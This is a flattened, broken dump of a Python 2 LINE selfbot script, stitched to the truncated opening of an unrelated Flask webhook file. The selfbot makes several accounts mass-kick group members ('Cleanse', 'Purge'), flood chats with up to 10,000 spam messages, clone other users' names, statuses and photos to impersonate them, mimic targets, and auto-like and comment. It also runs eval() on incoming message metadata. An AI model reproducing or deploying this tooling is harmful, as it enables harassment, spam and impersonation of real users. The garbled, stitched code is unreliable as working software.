cl.sendText(msg.to,"Gambar Foto Profilenya")
cl.sendImageWithURL(msg.to,Imoet)
if cover == "":
cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
else:
cl.sendText(msg.to,"Gambar Covernya")
cl.sendImageWithURL(msg.to,cover)
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp"]:
if msg.from_ in admin:
print("Sp")
start = time.time()
cl.sendText(msg.to, "Croot......")
elapsed_time = time.time()
cl.sendText(msg.to, "%Croot" % (elapsed_time))
elif msg.text in ["Speed","speed"]:
if msg.from_ in admin:
print("Speed")
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
ks.sendText(msg.to, "%sseconds" % (elapsed_time))
kt.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
elif msg.text in ["My backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = kt.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
kt.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
elif "My clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kt.getContact(target)
X = contact.displayName
profile = kt.getProfile()
profile.displayName = X
kt.updateProfile(profile)
kt.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kt.getProfile()
lol.statusMessage = Y
kt.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kt.updateProfilePicture(P)
except Exception as e:
kt.sendText(msg.to, "Failed!")
print e
#=================================================
elif "My backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = kt.getProfile()
profile.displayName = x
kt.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
kt.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
kt.updateProfilePicture(p)
kt.sendText(msg.to, "Succes")
except Exception as e:
kt.sendText(msg.to,"Gagagl!")
print e
#=================================================
elif msg.text == "Lurking":
if msg.from_ in admin:
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Lurking result":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═══════════════%s\n╠════════════════\n%s╠═══════════════\n║Readig point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "anda slah ketik-_-")
#========================================
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,kt]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#================================================
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=======================================
#-------------------Fungsi spam start--------------------------
elif "Spam change:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam change:","")
cl.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.from_ in admin:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#-------------------Fungsi spam finish----------------------------
#-----------------------------------------------
#-----------------------------------------------
elif 'apakah' in msg.text.lower():
if msg.from_ in admin:
tanya = msg.text.lower().replace("apakah","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#================================================
#===============================================
#=================================================
elif "Spamg " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spamg "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Steal mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Steal mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#========================================
elif msg.text in ["All join","Masuk"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
info = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kt.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "All_Kickers_Ok!"
G.preventJoinByTicket(G)
cl.updateGroup(G)
#=====================================================================================
elif msg.text in ["Bye allgc"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
#cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
ks.leaveGroup(i)
kt.leaveGroup(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"bye-bye")
else:
ki.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Bye","pulang"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
kt.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Center @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
cl.sendMessage(msg.to,"bye-bye")
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Nk "]:
if msg.from_ in admin:
mk0 = msg.text.replace("Nk ","")
mk1 = mk0.lstrip()
mk2 = mk1.replace("@","")
mk3 = mk2.rstrip()
_name = mk3
gs = ki.getGroup(msg.to)
targets = []
for h in gs.members:
if _name in h.displayName:
targets.append(h.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
if msg.from_ not in target:
ki.kickoutFromGroup(msg.to,[target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
#==========================================
elif msg.text in ["Purge"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"group purge")
return
for jj in matched_list:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-----------------------------------------------------------
elif "Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear banlist"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"succes clear all banlist")
elif msg.text in ["Banned"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"blacklist user list")
mc = "[⎈]Blacklist User[⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
#=============================================
# ----------------- BAN MEMBER BY TAG 2TAG ATAU 10TAG MEMBER
elif ("Ban repeat " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned ")
except:
pass
#============================================
#elif msg.text in ["Clear"]:
#if msg.toType == 2:
#group = cl.getGroup(msg.to)
#gMembMids = [contact.mid for contact in group.invitee]
#for _mid in gMembMids:
#random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
#cl.sendText(msg.to,"Clear boss!!!")
elif msg.text.lower() in ["mention all","Tag"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
summon(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
summon(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
summon(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
summon(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 25:
msg=op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
cl.sendMessage(msg)
if op.type == 25:
msg=op.message
if "@"+cl.getProfile().displayName in msg.text:
if wait["tag"] == True:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = (cl.getProfile().displayName+" sedang sibuk/Off \nPenting Chat aja 👇👇👇")
jawaban = (jawab)
cl.sendText(msg.to,jawaban)
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
if op.type == 32:
OWN = "u350cc7408cc6cc82e056ee046131f925"
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
kt.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n╠" + Name
wait2['ROM'][op.param1][op.param2] = "╠" + Name
else:
cl.sendText
except:
pass
#------------------------
if op.type == 59:
print op
except Exception as error:
print error
def autoSta():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kk.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kc.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ks.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kt.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ki.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kk.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kc.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ks.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kt.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread1 = threading.Thread(target=autoSta)
thread1.daemon = True
thread1.start()
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil ['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.60)
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
main.py
|
from flask import Flask, abort, request, logging, jsonify
import logging
import json
import requests
from urllib.parse import parse_qs
import urllib
from threading import Thread,active_count
import datetime
import math
import random
from queue import Queue
from azurewebhook_functions import *
# Define a function for the long running transferto thread
def process_wait(q):
print('starting process')
while True:
try:
json_data = q.get()
tf = Transferto()
tf.read_transferto_credentials_file('transfertocredentials.json')
tf.read_rapidpro_credentials_file('rapidprocredentials.json')
tf.initiate_rapidpro_json(json_data)
wait_time = math.floor(random.uniform(10,25))
